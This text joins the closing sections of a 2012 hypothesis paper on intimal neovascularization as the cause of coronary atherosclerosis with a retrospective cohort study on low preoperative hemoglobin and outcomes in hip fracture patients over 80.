Incorrect presentation of human coronary morphology (depicting the tunica intima as one cell layer covering a thin matrix layer) has several negative consequences, but the most crucial is that such a misperception cannot incorporate the outer lipid deposition paradox. Even when early intimal lipid deposition is mentioned, incorrect presentation of tunica intima morphology as a one-cell-layer structure covering a thin matrix layer means that outer lipid deposition does not appear surprising (paradoxical), and prevents a hypothesis from using this observation as a tool in the analysis of disease pathogenesis [82].
One plausible explanation for this oversight could be that medical scientists in mainstream research are not aware of the exact coronary artery morphology, or consider it an insignificant detail. This probably reflects how coronary histology is taught to medical students. Any standard textbook of histology, e.g. [87][88][89], and most monographs concerning coronary disease, e.g. [90][91][92][93], present coronary morphology in this way. The famous "Color Atlas of Cytology, Histology, and Microscopic Anatomy" by Wolfgang Kuehnel [94], used by medical students and translated into all Western languages, does not include coronary artery morphology, leaving readers with the illusion that it has the same morphology as any artery of this caliber. At best, some textbooks comment briefly that the intima of elastic arteries may be thicker [95,96] or that the intima of coronary arteries demonstrates the greatest age-related changes [97,98], still stressing the single-cell-layer intimal design. An example of such misrepresentation appears on the very popular Medscape website (a part of WebMD), which advertises itself as follows: "Medscape from WebMD offers specialists, primary care physicians, and other health professionals the Web's most robust and integrated medical information and educational tools" [99]. In its recently updated article on coronary artery atherosclerosis, Medscape states: "The healthy epicardial coronary artery consists of the following 3 layers: Intima, Media, Adventitia. The intima is an inner monolayer of endothelial cells lining the lumen; it is bound on the outside by internal elastic lamina, a fenestrated sheet of elastin fibers. The thin subendothelial space in between contains thin elastin and collagen fibers along with a few smooth muscle cells (SMCs)" [100]. The few modern textbooks presenting correct information, e.g. "Histology for Pathologists" [101] and "Vascular Pathology" [102], have not changed this common perception. Regardless of whether the above explanation is correct or not, this misperception of coronary artery design persists in research and education.
Failure to incorporate the facts of coronary artery design into hypotheses concerning the mechanism(s) of coronary atherosclerosis is worrying. The accepted hypothesis describes lipid invasion into the coronary DIT from the arterial lumen [5,6,82,86,103,104]. This vector and topology of events is the core of the hypothesis and of the assumed mechanism of the disease: "Lipids enter the arterial wall as compounds with protein fractions of blood plasma directly from arterial lumen" [105]. This pathway is unequivocally incorporated into the currently endorsed hypothesis and all offshoot models. Logically, these models predict that initial lipid deposition in the tunica intima should be most proximal to the lumen. However, it has been demonstrated that lipid accumulation appears not in the inner layers of DIT, which are proximal to the lumen, but in the distant outer layers [61,62,64,67]. Obviously, to reach an outer intimal layer, lipids would have to diffuse through numerous cell layers and a significant amount of matrix situated between the intimal cells. In diffusion or "filtration pressure" [106] models, however, lipid accumulation must be highest most proximal to the lumen, diminishing proportionally with intimal depth, comparable to the pattern of lipid accumulation in the tunica intima of non-diseased human aortas of individuals aged 6-15 years [107]. Why, then, does lipid accumulation in coronary atherosclerosis start in the deep layers of DIT, just above the internal elastic lamina, distant from the lumen? To explain this contradiction, the conventional hypothesis has to invoke conditions under which this puzzling pattern could theoretically arise: e.g. co-localization of the proteoglycan biglycan (which has a high binding capacity for lipoproteins) in the outer layer of DIT [62,67,82]. However, findings concerning biglycan location [62,67] could explain retention but not penetration, and even the former can only be explained with reservations: biglycan is expressed in several tissues of the body, so why is the outer DIT of the coronary arteries the target? Is this complicated model the only explanation?
Details of coronary artery structure are critically important for this analysis. It is therefore necessary to enumerate undisputed facts concerning coronary artery morphology. In the human heart, the single-cell layer of coronary tunica intima differentiates early in life to form DIT, which then continues to self-renew in a controlled manner throughout life in the majority of the population. When normal DIT becomes diseased, early pathology is difficult to distinguish morphologically from the norm [108,109], and sometimes this is also the case at advanced stages (post-transplant coronary atherosclerosis) [76]. Normal DIT, or normal intimal hyperplasia, is so striking in its resemblance to diseased hyperplasia that the former is known as "benign intimal hyperplasia" [110][111][112].
It is important to highlight that the normal human coronary tunica intima, evolving from one cell layer after birth to DIT in adults, is always avascular and remains so in the vast majority of hearts throughout life. Several studies have investigated this topic thoroughly and concluded that the coronary tunica intima receives oxygen and nutrients through diffusion from the arterial lumen [106,[113][114][115][116]; an earlier suggestion that nutrients from vasa vasorum could meaningfully contribute to coronary tunica intima nourishment [117] was never confirmed. Past findings of vasculature in normal coronary intima [118], later reprinted in [119], were attributed to the high pressure of the injected dye (ten times higher than normal) [106]. Therefore, once DIT attains a thickness of up to ten cell layers (at approximately five years of age), the inner and outer compartments of the tunica intima are exposed to different concentrations of blood constituents, as diffusion is inversely proportional to the square of the distance (i.e. DIT thickness). When this distance increases further, as happens in adult coronary DIT, contact of the outer intimal layers with certain blood constituents must be significantly reduced, if not abolished. Therefore, for adult or age-thickened [120] and disease-thickened coronary tunica intima, a diffusion deficit of the outer intimal layers can be assumed, similar to the model of Wolinsky and Glagov, known as the "critical depth" of avascular media or "rule 29" [121].
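As a minimal quantitative sketch of the distance argument invoked here (a textbook random-walk estimate, not a result from the cited studies), the characteristic time for a solute with diffusion coefficient D to traverse a layer of thickness L grows quadratically with L:

```latex
% Einstein-Smoluchowski estimate of the characteristic diffusion time:
% doubling the DIT thickness roughly quadruples the time needed for a
% blood constituent to reach the outer intimal layers by diffusion alone.
t_{\mathrm{diff}} \approx \frac{L^{2}}{2D}
```

On this scaling, a DIT that thickens from a few cell layers to the adult dimension multiplies the supply time manyfold, which is the sense in which the outer DIT can be said to suffer a diffusion deficit.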
As aforementioned, before plaque formation occurs, diseased DIT, or pathologic intimal thickening (PIT), is microscopically indistinguishable from normal DIT. However, one characteristic does distinguish diseased coronary DIT from normal DIT: pathological DIT (PIT), even at the very beginning of the disease, is always vascularized [106,[113][114][115]122]. This neovascularization, originating from adventitial vasa vasorum [123,124], is observed prior to the appearance of any atherosclerotic features except an increased dimension of DIT [125]. This neovascularization pattern is common to all diseased arterial DIT [126]. Contrary to an earlier report on coronary atherosclerosis [118,119], luminal neovascularization, although reported in one contemporary study, was found to be negligible: vasculature originating from adventitial vasa vasorum exceeds luminal vessels 28-fold [127]. This intimal neovasculature terminates exclusively in the outer tunica intima of the atherosclerotic human coronary artery, just above the internal elastic lamina [113,116,123,[127][128][129][130][131]. A comparable pattern of outer tunica intima neovascularization has been demonstrated in a porcine model of coronary atherosclerosis [132]. Let us now enumerate the facts: (1) Normal coronary DIT is an avascular compartment, receiving blood constituents through diffusion from the arterial lumen; (2) Normal outer DIT is the compartment most distant from both the arterial lumen and the adventitial vasa vasorum; therefore, the probability of diffusion of certain blood constituents, including LDL-C particles, to this depth is very low; (3) The outer avascular tunica intima of both normal and atherosclerotic coronary arteries is always rich in the proteoglycan biglycan, which has a high capacity for selective binding of lipoproteins; (4) In the normal coronary artery, biglycan of the outer DIT has no direct contact with blood, and interaction with LDL-C is prevented by the diffusion distance and the size of the LDL-C particle (20 nm); (5) In coronary atherosclerosis, the outer layers of DIT become exclusively neovascularized, and biglycan comes into direct contact with blood lipoproteins.
If the above statements stand, a simple conclusion can be reached: in coronary atherosclerosis, biglycan of the outer DIT should extract and retain LDL-C particles from the newly formed capillary beds, which are known to be very permeable [133,134]. This mechanism requires no special conditioning or complicated explanatory pathways. Furthermore, as observations show, lipid accumulation in the early stages of coronary atherosclerosis always begins in the outer layers of the coronary DIT [61,62,64,67].
The assumption that neovascularization of the outer tunica intima is the first step in pathogenesis yields a hypothesis that produces the simplest explanations for: (1) the initially deep localization of lipid deposition in the tunica intima; (2) a certain probability of coronary lipid deposition and atherosclerosis development at normal blood LDL levels if pathological neovascularization has occurred, owing to the accessibility of LDL-C to previously avascular structures (biglycan, which has affinity for LDL-C and should extract it regardless of LDL-C levels); (3) more probable lipid deposition and disease development at high blood LDL levels; (4) the possibility of coronary atherosclerosis developing after high LDL levels have been lowered with drugs, since neovascularization has already occurred and LDL-C particles remain in direct contact with previously avascular structures. At this point in the analysis, neovascularization of the coronary tunica intima appears to be a cause of coronary atherosclerosis. It logically follows that, since the presence of LDL-C in plasma is a fundamental metabolic requirement in humans [135], there is theoretically no "safe LDL-C level" that would be 100% certain to prevent coronary atherosclerosis once intimal neovascularization has occurred. The model therefore predicts that if the coronary intima becomes vascularized, lipoproteins will be extracted and retained by the intimal proteoglycan biglycan even at normal blood LDL levels, although lipoprotein extraction and deposition will be faster when LDL levels are high. These model predictions have been confirmed by clinical observations. Thus, contrary to the accepted model, the author's hypothesis suggests a different cause of the disease and the opposite route for the invasion of atherogenic lipoproteins into the coronary tunica intima.
It is plausible that other intimal components, expressed and stored in the avascular environment, would also interact with blood lipoproteins in the neovascularized environment. Hypothetical affinity for and binding of lipoproteins could result from LDL-C availability and matrix modifications under oxygenated conditions [136].
The author's hypothesis does not deny a contribution of lipoprotein deposition from the arterial lumen; such deposition is known to occur in the normal aorta, albeit with a different pattern [107]. In the author's model, however, lipoprotein deposition from the arterial lumen becomes irrelevant. Compare the probabilities of the two events (i.e. lipid deposition via the two pathways): (1) lipoproteins travel from the arterial lumen through the endothelium and multiple cell/matrix layers to be deposited in the outer DIT; (2) lipoproteins exude into the outer DIT from newly formed capillary beds, which terminate directly in the outer DIT and are very permeable [133,134]. The greater likelihood of the second pathway is obvious. The same logic can be applied to infer the route of monocyte infiltration into the coronary intima.
In previous publications, a similar mechanism was suggested to contribute to progression of already formed coronary plaques and inflammation in advanced human coronary atherosclerosis [137][138][139][140]. However, all prior analyses stop short of suggesting that neovascularization of the outer tunica intima is the cause of the disease.
This suggested mechanism of pathology is not unique. An identical mechanism, neovascularization of a normally avascular tissue compartment followed by lipoprotein deposition, is well known: corneal lipid keratopathy. The cornea is normally an avascular compartment [141,142]. More than 50 years ago, Cogan and Kuwabara described corneal lipid keratopathy, consisting of lipid deposition followed by fatty plaque formation, as occurring only in corneal areas that had previously been neovascularized [143]. Furthermore, the authors pointed to morphological similarities between corneal lipid plaques and those of atherosclerosis, and suggested a common pathogenesis [143]. In succeeding years, numerous reports reaffirmed the causal role of neovascularization in corneal lipid deposition, and hence the main treatment modality has become the inhibition of neovascularization [141,142,[144][145][146][147][148][149][150][151][152][153]. There is only a single clinical observation of lipid keratopathy without prior neovascularization [154], and a single experimental study that disputes the causal role of neovascularization in corneal lipid deposition [155]. Furthermore, it has been noted that the role of inflammation in this pathogenesis is limited to the induction of angiogenesis [152]. Lipoprotein levels in the aqueous humor are thought to be close to those in blood [156][157][158][159][160][161]. It is important to note that although the corneal substantia propria is separated from the aqueous humor by only Descemet's membrane and a single cell layer of corneal endothelium, lipid deposition has never been observed prior to corneal neovascularization (except in the one report mentioned above [154]). This strongly favors a model in which lipids exude from the permeable neovasculature into the cornea proper, rather than a diffusion model.
The fact that a similar sequence of events culminating in lipid deposition underlies the pathogenesis of an unrelated corneal disease reinforces the new hypothesis suggested here for the mechanism of coronary atherosclerosis.
Why does the arterial tunica intima become neovascularized in the first place? Early in life, the tunica intima of human coronary arteries differentiates from a single-cell-layer compartment into a multi-layered cellular structure (i.e. DIT) through proliferation of residual and medial cells, and probably with the participation of blood-borne cells. Intimal proliferation with increasing cell numbers continues until approximately 30 years of age [68,72] and thereafter maintains controlled self-renewal throughout life. The mechanisms that initiate this morphogenesis and control it later in life are unknown, but it can be concluded that cells in the coronary tunica intima possess an inherently high proliferative capacity. During normal growth transformations the coronary DIT remains avascular, and its dimension (thickness) allows all intimal cells to receive sufficient oxygen and nutrients through diffusion from the arterial lumen.
If we were to choose one feature that universally reflects the reaction of the arterial tunica intima, and particularly the coronary intima, to the variety of stimuli, injuring factors, and interventions encountered in clinics and experiments, the answer is undoubtedly intimal cell proliferation. Regardless of the nature and magnitude of the stimulus or insult, cells that appear in the arterial intimal compartment (normal or artificial, e.g. [162][163][164][165][166][167]) always proliferate in response. Furthermore, the arterial tunica intima is known to develop two normal variant phenotypes: a one-cell lining and a multi-layered cellular compartment, i.e. DIT. The first phenotype is maintained in all small and most medium caliber arteries, but certain arterial segments (e.g. coronary) normally evolve into the second phenotype. Each intimal type can be maintained as a stable phenotype or produce excessive intimal cell proliferation. Multiple observations have demonstrated that the cells participating in this morphogenesis can be of different origins. As for the regulation directing normal and pathological morphogenesis, shear stress has been suggested as the major factor [168][169][170][171][172][173][174][175][176][177][178]. In addition, I have hypothesized that the arterial blood-tissue interface itself (as a topological entity) contributes to this morphogenesis, and that the enhanced proliferative capacity of the arterial intima is a reflection of phenotype selection [69,179] (though these statements do not suggest mechanisms of regulation). All observations demonstrate that intimal proliferation can be induced by stimuli and insults of very different nature and magnitude, which suggests that they act as non-specific triggers of a preexisting regulatory program for proliferative morphogenesis. The ability of the arterial intima, and particularly the coronary intima, to slip into proliferative morphogenesis has been described as a genetic predisposition that can manifest as "a hyperplastic vasculomyopathy" [180].
Therefore, cells in the coronary tunica intima respond to any stimulus, exogenous or endogenous, by proliferating. An increase in cell numbers inevitably expands intimal thickness, which also occurs with aging [119,181]. Expanded intimal thickness impairs the diffusion of oxygen, as diffusion is inversely proportional to the square of the distance. Insufficient oxygen diffusion inevitably results in hypoxia, specifically of cells in the outer DIT, because this tissue compartment is the most distant from both the lumen and the adventitial vasa vasorum [182].
What happens when the coronary DIT becomes larger owing to cell proliferation or excessive matrix deposition (possible participation of the intimal matrix was not discussed above because few facts describe this pathway)? A straightforward answer was given by Gladstone Osborn: "When the intima of the coronary artery exceeds a certain thickness parts must either die or develop secondary blood supply" [183]. Since tissue hypoxia is a known inducer of angiogenesis and pathological neovascularization [184,185], neovascularization of the outer compartment of diseased coronary DIT from adventitial vasa vasorum must follow coronary DIT expansion. The author agrees with Geiringer's assertion that ". . .intimal vascularization is a function of intimal thickness and not of atherosclerosis" [105]. The author's deduction from the above is that intimal proliferation/thickening and neovascularization are the causes of coronary atherosclerosis; it is hypothesized herein that proliferation of intimal cells initiates atherosclerosis. This is not a new model. The mechanism was suggested some time ago, although without the subsequent neovascularization of coronary DIT [186][187][188][189][190][191][192]. However, the viewpoint that intimal cell proliferation is the beginning of atherosclerosis [186][187][188][189][190][191][192] was superseded by the currently endorsed hypothesis, which asserts that arterial intimal proliferation is secondary to lipid/macrophage penetration and inflammation [2,3,5,6,193]. Reflecting the prevailing hypothesis, the current classification of atherosclerosis excludes a variety of arterial pathologies characterized by intimal cell proliferation [194]. Yet the currently endorsed hypothesis is based on an incorrect perception of coronary artery morphology: DIT enlargement and subsequent neovascularization were not recognized as initiators of the disease, and this view does not acknowledge outer lipid deposition as paradoxical. The currently endorsed model, based on invasion of lipoproteins from the coronary lumen, is very unlikely in the light of preceding DIT neovascularization. In the model outlined herein, neovascularization of the deep layers of DIT from the vasa vasorum makes initial outer intimal lipid deposition logical rather than paradoxical. Neovascularization of the previously avascular deep layers of coronary DIT, which makes blood lipoproteins available for extraction and retention by the DIT matrix, explains the controversies regarding normal LDL-C levels (spontaneous or drug-modulated) and the risk of coronary atherosclerosis.
The suggested hypothesis is presented schematically in Figure 6.
Summary
(1) A hypothesis underlying our efforts to approach coronary atherosclerosis must be consistent with the undisputed facts concerning the subject. Furthermore, a hypothesis should withstand logical evaluation and must not contradict established and proven concepts in biology and medicine without well-grounded reasons.
(2) Atherosclerosis occurs in arteries with normal DIT, while sparing the rest of the arterial bed. However, while normal DIT exists in numerous arteries [120,194], some of these are never affected by atherosclerosis, whereas coronary arteries are almost always the target. On logical grounds, an arterial disease that never affects some arteries but usually affects certain others is not systemic.
(3) Coronary atherosclerosis is not an inflammatory disease, as multiple clinical trials demonstrate no correlation between anti-inflammatory therapies and risk of disease.
(4) High LDL levels are not a fundamental cause of coronary atherosclerosis, as lowering such levels protects only 30-40% of those at risk. Furthermore, humans and animals with normal LDL levels can suffer from coronary atherosclerosis.
(5) Neovascularization of the normally avascular DIT is the obligatory condition for the development of coronary atherosclerosis. This neovascularization originates from the adventitial vasa vasorum and vascularizes the outer part of the coronary DIT, where LDL deposition initially occurs.
(6) It is suggested that excessive cell replication in DIT is a cause of DIT enlargement; the participation of enhanced matrix deposition is also plausible. An increase in DIT dimension impairs nutrient diffusion from the coronary lumen, causing ischemia of cells in the outer part of the coronary DIT.
(7) Ischemia of the outer DIT induces angiogenesis and neovascularization from the adventitial vasa vasorum. The newly formed vascular bed terminates in the outer part of the coronary DIT, above the internal elastic membrane, and consists of permeable vasculature.
(8) The outer part of the coronary DIT is rich in the proteoglycan biglycan, which has a high binding capacity for LDL-C. In avascular DIT, biglycan has very limited access to LDL-C owing to the diffusion distance and the properties of LDL-C; after neovascularization of the outer DIT, biglycan acquires access to LDL-C particles, which it extracts and retains.
(9) Initial lipoprotein influx and deposition occurs from the neovasculature originating from the adventitial vasa vasorum, not from the arterial lumen.
(10) Although lipoprotein deposition in the outer part of the coronary DIT is the earliest pathological manifestation of coronary atherosclerosis, intimal neovascularization from the adventitial vasa vasorum must precede it.
Therefore, in the coronary artery tunica intima, a previously avascular tissue compartment becomes vascularized. All other tissue compartments developed (both phylogenetically and ontogenetically) under constant exposure to capillary beds and blood; their tissue components were therefore selected not to bind LDL. This is why atherosclerosis is mostly limited to the coronary arteries. To my knowledge, the only other example, the avascular cornea, shows the same lipid deposition after neovascularization.

Figure 6. Schematic representation of the mechanism of CA. (a) Normal coronary artery: the coronary tunica intima forms DIT with biglycan accumulations in the outer DIT, which is most distant from the arterial lumen. (b) DIT enlarged by cell proliferation and matrix production; cells in the outer DIT undergo hypoxia owing to the increased diffusion distance. (c) Neovascularization of the outer DIT from the adventitial vasa vasorum; the newly formed vessels are highly permeable. (d) Biglycan of the outer DIT comes into direct contact with blood LDL-C, facilitating binding, retention, and deposition of LDL-C in the outer DIT, while the inner DIT remains free of lipoproteins. Stage (d) corresponds to fatty streaks of Grade 1 and Grade 2 in the Nakashima et al. study [62]. Note that in the schematic of the normal coronary artery (a), the number of DIT layers shown is less than my estimate in the text; this alteration was necessary to present half of the arterial circumference while emphasizing DIT enlargement in the same picture.
The author does not claim that this hypothesis offers an immediate solution. Intimal cell proliferation, which produces DIT and its later expansion, is cell hyperplasia: the newly arrived cells are similar to normal residual cells, making systemic targeting very difficult. And while the author strongly believes that intimal neovascularization is the crucial step in the pathogenesis of coronary atherosclerosis, there are obvious concerns about inhibiting angiogenesis in a heart with an already jeopardized myocardial blood supply. The goal here was rather to evaluate, logically and factually, the hypotheses and perceptions we exercise in approaching coronary atherosclerosis, and to offer a more coherent model. A further intent was to underline paradoxical observations that could provide new insights into the mechanisms of the disease. Atherosclerotic plaque growth and rupture are not paradoxical but anticipated events. In contrast, initial lipid deposition in the outer layers of DIT with no deposition in the inner layers is a paradoxical observation, and it requires an explanatory model different from the accepted one. To recognize the paradox, however, the perception of the coronary artery structure in which the pathology occurs must not be distorted by incorrect illustrations and verbal descriptions. When we name or depict things incorrectly, often merely for nosological reasons, the incorrect perception of events may persist in spite of growing knowledge, impeding our attempts to discover the truth.
Conflict of interest
The author declares that he has no competing interests.
Author's contribution
VMS conducted all the work involved in preparing and writing this paper.
"year": 2012,
"sha1": "74c7f6c4dfe9ed7df868c2e68235965c1f4eda3f",
"oa_license": "CCBY",
"oa_url": "https://europepmc.org/articles/pmc3492120?pdf=render",
"oa_status": "GREEN",
"pdf_src": "SpringerNature",
"pdf_hash": "74c7f6c4dfe9ed7df868c2e68235965c1f4eda3f",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": []
} |
Preoperative Hemoglobin <10 g/dL Predicts an Increase in Major Adverse Cardiac Events in Patients With Hip Fracture Over 80 Years: A Retrospective Cohort Study
Background: Preoperative anemia has been associated with perioperative morbidity and mortality in patients undergoing cardiac and non-cardiac surgery and is common in elderly hip fracture patients. The primary objective of this study was to explore the relationship between preoperative hemoglobin levels and postoperative major adverse cardiovascular events (MACEs) in hip fracture patients over 80 years. Methods: This retrospective study enrolled hip fracture patients over 80 years treated in our center from January 2015 to December 2021. Data were collected from the hospital's electronic database after approval by the ethics committee. The primary outcome was MACEs; the secondary outcomes included in-hospital mortality, delirium, acute renal failure, ICU admission rate, and transfusion (>2 U). Results: 912 patients were included in the final analysis. Based on the restricted cubic spline, a preoperative hemoglobin level <10 g/dL was associated with an increased risk of postoperative complications. In univariable logistic analysis, a hemoglobin level <10 g/dL was associated with increased MACEs [OR 1.769, 95% CI (1.074, 2.914), P = .025], in-hospital mortality [OR 2.709, 95% CI (1.215, 6.039), P = .015], and transfusion >2 U [OR 2.049, 95% CI (1.56, 2.69), P < .001]. Even after adjustment for confounding factors, MACEs [OR 1.790, 95% CI (1.073, 2.985), P = .026], in-hospital mortality [OR 2.81, 95% CI (1.214, 6.514), P = .016], and transfusion >2 U [OR 2.002, 95% CI (1.516, 2.65), P < .001] remained more frequent in the lower-hemoglobin cohort. Moreover, a log-rank test showed increased in-hospital mortality in the cohort with a preoperative hemoglobin level <10 g/dL. However, there was no difference in delirium, acute renal failure, or ICU admission rates. Conclusions: For hip fracture patients over 80 years, a preoperative hemoglobin level <10 g/dL might be associated with increased postoperative MACEs, in-hospital mortality, and transfusion >2 U.
Introduction
Hip fracture is the main traumatic injury among seniors and has become a public health issue with the growing aging population. Comorbidities in older patients may deteriorate rapidly due to direct and indirect influences such as immobilization, pain, and anemia. In addition, the hip fracture itself results in blood loss and may cause or worsen anemia in elderly patients. [1][2][3][4] Preoperative anemia is associated with perioperative morbidity and mortality in patients undergoing cardiac and non-cardiac surgery. [5][6][7][8][9][10] The WHO defines anemia as a hemoglobin level below 12 g/dL in women and below 13 g/dL in men. 11 Anemia is common in older patients, especially in trauma surgery patients, and can impair the function of vital organs (heart, brain, kidney) in surgical patients. Research indicates that the clinical consequences of anemia might result from anemia-induced tissue hypoxia. 12 Few studies have addressed the relationship between preoperative anemia and postoperative outcomes in patients over 80 years undergoing hip surgery, or the optimal level of preoperative hemoglobin in these patients. The purpose of this retrospective observational study was to investigate the relationship between preoperative hemoglobin levels and postoperative morbidity and mortality in this subgroup of patients.
Data Sources and Study Population
After approval from the institutional Ethics Committee, we accessed the medical records of all eligible patients via the clinical electronic database. This was a retrospective cohort study, and the procedure followed the STROBE reporting guidelines. Data on elderly surgical patients (over 80 years) with hip fractures were extracted from the clinical electronic database from January 2015 to December 2021. The exclusion criteria were as follows: (1) multiple fractures; (2) other surgeries within 3 months; (3) revision surgery; (4) history of brain surgery; (5) missing baseline data.
Endpoints
The primary outcome was major adverse cardiac events (MACEs). The secondary outcomes were in-hospital mortality, delirium, acute renal failure (ARF), ICU admission, and perioperative transfusion (>2 U). MACEs comprise recurrent angina, myocardial infarction, cardiac failure, malignant arrhythmia, and death from cardiovascular causes. A decrease in eGFR and an increase in creatinine were used to diagnose ARF. Delirium was diagnosed with the Confusion Assessment Method (CAM-5).
Covariates Associated With Endpoints
Demographic variables were extracted for baseline characteristics. Comorbidities were recorded, including hypertension, diabetes, chronic obstructive pulmonary disease (COPD), coronary artery disease (CAD), heart failure, atrial fibrillation, stroke, renal failure, and cancer. Anesthesia types included general anesthesia with a nerve block, nerve block with sedation, and neuraxial anesthesia. The hip fracture types were intertrochanteric, subtrochanteric, femoral neck, and trochanter. Surgical procedures included internal fixation, hemiarthroplasty, and arthroplasty.
Statistical Analysis
Continuous variables are presented as the mean (SD), and categorical variables as proportions. The enrolled patients were divided into 4 cohorts, as indicated by the transfusion guidelines, for comparison of baseline characteristics. Analysis of variance, the chi-square test, Fisher's exact test, or the Kruskal-Wallis rank-sum test was applied as appropriate. To explore the association between the preoperative hemoglobin level and all endpoints in patients over 80 years undergoing hip fracture surgery, restricted cubic spline curves (RCSs) were fitted based on Cox proportional hazards models with 4 knots at the 5th, 35th, 65th, and 95th percentiles. 13 The analyses were adjusted for age, sex, preoperative days, and comorbidities. Primary and secondary outcomes were analyzed using both unadjusted regression and adjusted multivariable regression, with a preoperative hemoglobin level of 10 g/dL as the reference cutoff based on the RCS curve. For sensitivity analyses, the subgroup of patients aged 80 to 89 years was tested for all endpoints. A two-tailed P value of less than .05 was considered statistically significant. All analyses were processed using SPSS 26.0 and R version 4.0.
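Purely as an illustration of the regression modeling described in this section (the study itself used SPSS 26.0 and R 4.0), the following Python sketch fits an unadjusted and an adjusted logistic model for MACEs with hemoglobin dichotomized at 10 g/dL. The file name and all column names are hypothetical placeholders, not the study's actual variables.

```python
# Illustrative sketch only: logistic models for MACEs with preoperative
# hemoglobin dichotomized at 10 g/dL. File and column names are hypothetical.
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

df = pd.read_csv("hip_fracture_cohort.csv")      # hypothetical data file
df["hb_lt10"] = (df["hb"] < 10.0).astype(int)    # reference: hb >= 10 g/dL

# Unadjusted (univariable) model
unadj = smf.logit("mace ~ hb_lt10", data=df).fit(disp=False)

# Adjusted model with the covariates named in the Methods
adj = smf.logit(
    "mace ~ hb_lt10 + age + C(sex) + C(asa) + C(anesthesia) + C(surgery)"
    " + copd + hypertension + diabetes + heart_failure"
    " + atrial_fibrillation + renal_failure",
    data=df,
).fit(disp=False)

# Odds ratio and 95% CI for hb < 10 g/dL in the adjusted model
or_hb = np.exp(adj.params["hb_lt10"])
ci_hb = np.exp(adj.conf_int().loc["hb_lt10"])
print(f"adjusted OR {or_hb:.3f}, 95% CI ({ci_hb.iloc[0]:.3f}, {ci_hb.iloc[1]:.3f})")
```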
Results
From 2015 to 2021, a total of 1,116 hip fracture patients over 80 years were screened for the study. Seventy-two patients with multiple injuries or multiple procedures during the same admission were excluded, as were patients undergoing ipsilateral revision procedures. Ten patients were excluded for having received other surgeries within 3 months, and another sixty-six were excluded for missing baseline data. A total of 912 eligible hip fracture patients over 80 years of age were included in the study (Figure 1).
Preoperative Hemoglobin and Endpoints
Sixty-seven MACEs and twenty-six deaths were identified during hospitalization after surgery. After adjusting for all potential confounders (age, sex, ASA classification, diagnosis, anesthesia method, surgery type, and comorbidities), the relationship between the preoperative hemoglobin level and MACEs/other composite complications is shown in Figure 2. According to the curves, a preoperative hemoglobin level higher than 10 g/dL was associated with a lower occurrence of complications. In univariable logistic analysis, the hemoglobin <10 g/dL cohort had increased MACEs [OR 1.769, 95% CI (1.074, 2.914), P = .025], in-hospital mortality [OR 2.709, 95% CI (1.215, 6.039), P = .015], and transfusion >2 U [OR 2.049, 95% CI (1.56, 2.69), P < .001]; these associations persisted after multivariable adjustment. The log-rank analysis also showed an increased hospital length of stay in the cohort with a preoperative hemoglobin level <10 g/dL (Table 2). Additionally, Kaplan-Meier analysis demonstrated that a hemoglobin level <10 g/dL was associated with higher in-hospital mortality (Figure 3).
Sensitivity Analysis
To test the robustness of the results, patients between 80 and 89 years of age were analyzed separately. The results were consistent with the main analysis (Table 3).
Discussion
In the current study, we demonstrate that for patients over 80 years undergoing hip fracture surgery, a preoperative hemoglobin level <10 g/dL might be associated with increased postoperative MACEs, in-hospital mortality, and more transfusions >2 U. The results held after multivariable adjustment and subgroup analysis.

[Figure 2 caption: (A) Preoperative hemoglobin level and RCS of MACEs. (B) Preoperative hemoglobin level and RCS of other composite complications. Both panels adjusted for age, sex, ASA classification, diagnosis, anesthesia method, surgery type, and comorbidities (COPD, hypertension, diabetes, heart failure, atrial fibrillation, preoperative pneumonia, and renal failure); the pink zone represents the 95% confidence interval of the spline model.]
Several studies have explored the relationship between preoperative anemia and postoperative outcomes. A retrospective cohort study by Musallam and colleagues analyzed data from 227,425 patients undergoing noncardiac surgery and concluded that preoperative anemia was independently associated with an increased risk of 30-day morbidity and mortality. 5 Furthermore, they found that even with a mild degree of preoperative anemia, composite postoperative morbidity at 30 days was higher than in patients without anemia. Prior hip fracture research, however, has focused on femoral neck fractures and arthroplasty procedures, whereas intertrochanteric fractures occur more frequently in the over-80 group and arthroplasty is not prioritized over other surgery types in these patients. Another large-scale retrospective cohort study of 5,922 primary arthroplasty procedures reported that the presence of anemia was associated with inferior outcomes after arthroplasty. Patients with anemia were more likely to require blood transfusion than patients without preoperative anemia, which is consistent with our conclusion, and they were also more likely to have postoperative complications. 6 Similarly, we observed increased cardiovascular-related complications and in-hospital mortality, in agreement with the results of Bailey and colleagues.
Compared with other factors, such as old age, anemia is a modifiable preoperative condition, yet there is no universal preoperative hemoglobin threshold for frail elderly patients over 80 years undergoing hip fracture surgery. The 2011 transfusion guidelines recommended a transfusion threshold of 9 or 10 g/dL for patients with a history of ischemic heart disease and suggested a higher transfusion trigger for older patients. 14 In Denmark, a hemoglobin level of 9.7 g/dL is recommended as the RBC transfusion threshold. 15 The 2021 guidelines for the management of hip fractures recommended that the recognition and management of blood loss proceed according to an agreed-upon hospital protocol. 16 What, then, is the optimal preoperative hemoglobin level for hip fracture patients over 80 years? The recommendations of the 2018 Frankfurt consensus conference suggested 8 g/dL in patients with hip fracture and cardiovascular disease or other risk factors. However, although data from 17,607 literature citations and 145 studies, including 63 RCTs with 23,143 patients and 82 observational studies with more than 4 million patients, were analyzed, this was a conditional recommendation; only 10 of the studies analyzed hip fracture patients, and none focused on patients over 80 years old. 17 Neef and colleagues 18 summarized the current situation and concluded that preoperative anemia management has not yet been established, although the available studies confirm the positive effect of preoperative anemia diagnosis and treatment. For the special group of hip surgery patients over 80 years, workflows for the detection and correction of preoperative anemia have been established in our center. The 2018 guidelines suggested that the hemoglobin trigger could be lower than 10 g/dL, but the evidence for frail hip fracture patients over 80 years old is insufficient. 19 Although blood management in cardiac surgery favors a restrictive over a liberal transfusion strategy, 20-23 trials and reviews focusing on hip fracture patients hold a different view. A context-specific systematic review and meta-analysis, stratified by patient characteristics and clinical setting and thus closer to real-world practice, reported that restrictive transfusion strategies should be applied with caution in high-risk patients undergoing major surgery, in whom they may be detrimental. 24 A meta-analysis by Gu and colleagues 25 reviewed ten studies and found that restrictive transfusion (mostly a hemoglobin threshold of 8 g/dL or symptomatic anemia) increased the risk of cardiovascular events compared with liberal transfusion (mostly a threshold of 10 g/dL) in patients undergoing hip fracture surgery (RR = 1.51, 95% CI: 1.16, 1.98; P = .003). The TRIFE randomized controlled trial enrolled 284 hip fracture patients over 65 years of age and concluded that, for frail elderly hip fracture patients, recovery from physical disability under a restrictive transfusion strategy (threshold 9.7 g/dL) was similar to that under a liberal strategy (threshold 11.3 g/dL). 26 